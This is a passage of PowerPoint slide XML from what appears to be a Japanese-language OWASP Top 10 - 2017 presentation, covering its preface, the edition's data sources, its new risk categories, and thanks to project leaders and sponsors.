                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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最後に、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロジェクトのリーダーシップを創設した </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Dave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Wichers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>と</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jeff Williams</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のすべてのご尽力と、コミュニティの助けがあればこれをやり遂げられると私たちチームを信じてくれたことに感謝を述べたいと思います。</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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Brian Glas</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Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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57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ja-JP" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロジェクトのスポンサー</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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1525622">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:b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br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 - 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のスポンサー </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Autodesk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>社に感謝します。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>脆弱性の蔓延状況を示すデータやその他のご助力を提供してくださった組織ならびに個人は</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>謝辞</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のリストに記載しました。</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FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>前書き</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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1264104137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939601"/>
          <a:ext cx="6858000" cy="909082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lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>へようこそ</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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753388">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>今回のメジャーアップデートでは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>安全でないデシリアライゼーション</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>と</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>不十分なロギングとモニタリング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>という</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つの問題を含む、いくつかの新しい問題が追加されています。</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の以前のリリースとの重要な差別化要素が２つあります。相当なコミュニティからのフィードバックと、数多くの組織から集められた広範囲のデータです。アプリケーションセキュリティ標準を準備するという状況のもとでは、おそらく最大量のデータが集められたのではないかと考えています。このことから、新しい版の</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が、現在数々の組織が直面している最も影響の大きなアプリケーションセキュリティリスクに向けられているという確信が得られます。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2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年版の</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は、主に、アプリケーションのセキュリティを専門とする企業から寄せられた</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>40</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>以上のデータと、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>500</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>人以上の個々の人々による業界調査に基づいています。データは、数百の組織の、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>万以上の実在するアプリケーションおよび</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>から集められた脆弱性にまたがるものです。</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の項目は、この蔓延度合いを反映しているデータにしたがって、悪用のしやすさ、検知のしやすさ、および影響についての共通認識の推計を組み合わせた上で、選択し、優先順位を付けます。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OWASP Top10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の主要な目的は、開発者、デザイナー、アーキテクト、マネージャ、組織に、最も一般的かつ最も重要な</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションセキュリティの弱点の影響について教育することです。また、これらのリスクの高い問題のある領域を守るための基本的なテクニックを提供し、現時点からどこへ進めるべきなかについてのガイダンスを提供します。</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06285732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4097905"/>
          <a:ext cx="3352800" cy="5805956"/>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1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>将来への道筋</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5468516">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>まででやめない。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>で説明されているように、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
